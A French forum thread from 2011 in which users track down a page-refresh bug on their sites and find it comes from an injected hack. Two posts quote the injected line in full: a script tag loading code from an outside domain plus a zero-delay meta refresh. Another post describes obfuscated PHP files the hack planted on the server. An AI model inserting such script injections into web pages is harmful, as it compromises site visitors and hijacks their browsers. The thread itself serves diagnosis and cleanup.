23 réponses à ce sujet

[ace]

Bon, je ne sais pas trop où poster, mais j'ai un bug relativement embêtant quand je vais sur cafzone.
Dès que je change de la première page, les autres pages passent leur temps à se rafraichir aussi bien sur firefox que sur Chrome.
Si quelqu'un a une idée ?

[AnA-l]

Clic droit sur la page, et check que t'as pas un truc genre auto refresh qui est actif. (Mais en lisant, ca le ferait que sur un seul navigateur, a moins qu'il y ait une feinte.).
T'as pas un userscript qui est activé qui aurait un effet de bord ou un truc comme ca ptet.

[Caféine]

Alors j'ai eu le bug 1 fois, jamais réussi à le refaire... :x

[Zanis]

J'ai eu le bug tout à l'heure quand j'ai cliqué sur le tag "dubstep" pour retrouver une vidéo. Là je viens de retenter et aucun souci... Vraiment zarb =/

[ace]

Bon, quand je regarde via firefox les informations sur la page,
J'ai une Méta:
Nom     Contenu
Refresh     0;url=http://www.cafzone.net/page/2/

Si ça peut aider

[laloutr3]

Je viens d'avoir le bug sur la page de la vidéo de Skyrim, et la après test ça le fait plus...

[Caféine]

Ca va m'énerver ce bug !!! :x

[ace]

Je viens d'essayer depuis le taf, même problème.
Alors en essayant un peu plus, cela ne me le fait que sur les pages principales sauf la 1.
Si je clic sur un sujet par exemple, une fois dans le sujet c'est bon ("Made in iceland, en tête de la page 2, une fois dedans c'est bon).
ah et en revenant en arrière , là c'est bon ????????????
Et là cela ne me le fait plus (tout ça en 5 minutes).
Je testerai de nouveau de chez moi ce soir.

[Caféine]

J'arrive pas du tout à le reproduire, tenté avec 4 browser. Et pourtant j'ai eu le problème vendredi. CA M'AGACE. :x

[Greytarkis]

donc, après avoir zieuter le code en diagonal, j'ai

<meta http-equiv='refresh'  

qui doit s'exécuter toutes les 0 secondes... je sais pas si c'est dans le code de base ou une extension chrome qui fait bugger/ajoute ça par erreur, mais le refresh viens de là je pense.

edit : le code complet, c'est la toute première ligne.

<script src='http://turnitupnow.net/?rnd=3697%2Ften.enozfac.www'></script><meta http-equiv='refresh' content='0;url=http://www.cafzone.net/'>

voilà c'est une réponse à la va-vite, j'ai pas beaucoup mieux à proposer/dire.

Modifié par Greytarkis, 14 November 2011 - 12:18.

[Faskil]

Same. Impossible de le reproduire. :/

[Donjohn]

Bon, j'ai ptet une explication et faudrait regarder par là car c'est lié imho

Winny s'est fait hacké son blog, un vieux dotclear. Le hack : cette ligne de code en haut de page :

<script src='http://turnitupnow.net/?rnd=3697%2Ften.enozfac.www'></script><meta http-equiv='refresh' content='0;url=http://winny.fr/'>

On a stop le blog immédiatement et mis un wordpress à jour (jeudi dernier). Mais comme son blog est hébergé sur le même serveur, je me demande s'il y a pas un lien...

bref, ça pue.

[Caféine]

Le truc zarb c'est que je vois rien du tout dans le source... :x

OK trouvé, injection de code dans le header via hack mais je sais pas comment le mec a fait...

Je préviens Unreal...

Des infos ici : http://wpquestions.c...on/show/id/3341

[Donjohn]

Caféine, le 14 November 2011 - 13:17, dit :

Le truc zarb c'est que je vois rien du tout dans le source... :x

OK trouvé, injection de code dans le header via hack mais je sais pas comment le mec a fait...

Je préviens Unreal...

Des infos ici : http://wpquestions.c...on/show/id/3341

Si je comprends bien, c'est pas Winny qui s'est fait hack son site mais cafzone ou tout du moins un wrodpress ? et ça impacté les autres siteweb hébergés sur le serveur ?
Il y a quoi d'autre comme site ? Hawks-Reborn est tjs dessus ? Ou bien c'est HR qui s'est fait hack ?

bref... ça pue...


Edit : ok ca serait une injection via TinyMCE utilisé dans le vieux DotClear. En gros, on se tape une nettoyage complet ce soir ? ou c'est tellement la merde que ça va pas suffire ?

Modifié par Donjohn, 14 November 2011 - 14:30.

[Funkylolo]

Donjohn, le 14 November 2011 - 14:17, dit :

Si je comprends bien, c'est pas Winny qui s'est fait hack son site mais cafzone ou tout du moins un wrodpress ? et ça impacté les autres siteweb hébergés sur le serveur ?
Il y a quoi d'autre comme site ? Hawks-Reborn est tjs dessus ? Ou bien c'est HR qui s'est fait hack ?

bref... ça pue...


Edit : ok ca serait une injection via TinyMCE utilisé dans le vieux DotClear. En gros, on se tape une nettoyage complet ce soir ? ou c'est tellement la merde que ça va pas suffire ?

J'ai rien remarqué de spécial sur HR mais je peux pas tout regarder à fond depuis le taf, je check plus en profondeur ce soir :x
J'avais remarqué le refresh sur GZ sans y faire attention mais jamais rencontré sur HR.

Par contre, j'ai regardé un peu plus en détails l'histoire de TinyMCE: IPB utilise CKEditor et ça ne semble donc pas pouvoir être l'accès direct (ce qui pourrait donc avoir épargné HR). Par contre est-ce que ça ne peut pas être lié à Cafzone.net, WP utilisant tinyMCE (de même que Dotclear/WP pour le blog de Winny)?

[Caféine]

Donc non a priori ça passe par le vieux TinyMCE, mais le hack est capable de remonter sur le root du serveur et d'aller faire chier le reste. Perso ça avait touché 4 sites, GZ too : check des fichiers tmp_xxxxxxx (nombres).php avec du code à base de substr... Même l'index.php de gz était touché... (+init.php, etc. check ALL !!!!)  

Attack le 9 novembre 2011 entre 7h00 et 9h00 en gros.

[Donjohn]

ya une chaine texte unique à chercher ?? un bout de code facilement identifiable ?

je vais DL les 3 comptes Winny/Chaaat et le mien et check tous les fichiers un par un.

[Caféine]

Donjohn, le 14 November 2011 - 15:18, dit :

ya une chaine texte unique à chercher ?? un bout de code facilement identifiable ?

je vais DL les 3 comptes Winny/Chaaat et le mien et check tous les fichiers un par un.

http://pastebin.com/....com/8vfuzWK8  

Version lisble : http://pastebin.com/zmWCsULL

[pr7]

Doit-on s'inquiéter pour nos mots de passe ?

[Donjohn]

pr7, le 15 November 2011 - 07:57, dit :

Doit-on s'inquiéter pour nos mots de passe ?

tu sors... (mais elle était bonne, j'avoue )

[AnA-l]

La question est legitime. Perso, me suis fait hacker mon gmail par une ip viet, a peu pres au meme moment. Ca m'etonnerais qu'a moitié qu'il y ait un lien.

[Caféine]

Nope c'est pas un hack DB du tout. Du reste, le serveur et tous les sites hostés dessus sont cleanés et les mdp admin (ceux qu'on trouve dans des fichiers de conf, pas forcément cryptés) sont changés par Unreal. Bref, situation normalisée et ça nous force à tout updater, virer les sites vieux et non-updatés. Il y a eu INJECTION de code dans nos fichiers, pas récupération de data.

Le hack sert en fait à faire des shadow clics sur un site à la con...  

[pr7]

Ok, merci pour l'explication.

[ace]

bon, en tout cas, cela ne "refresh" plus chez moi, tester aussi bien sur FF que Chrome.
Merci les gens
(juste les pages un peu lente à charger, mais à, je soupçonne mon cher ami free)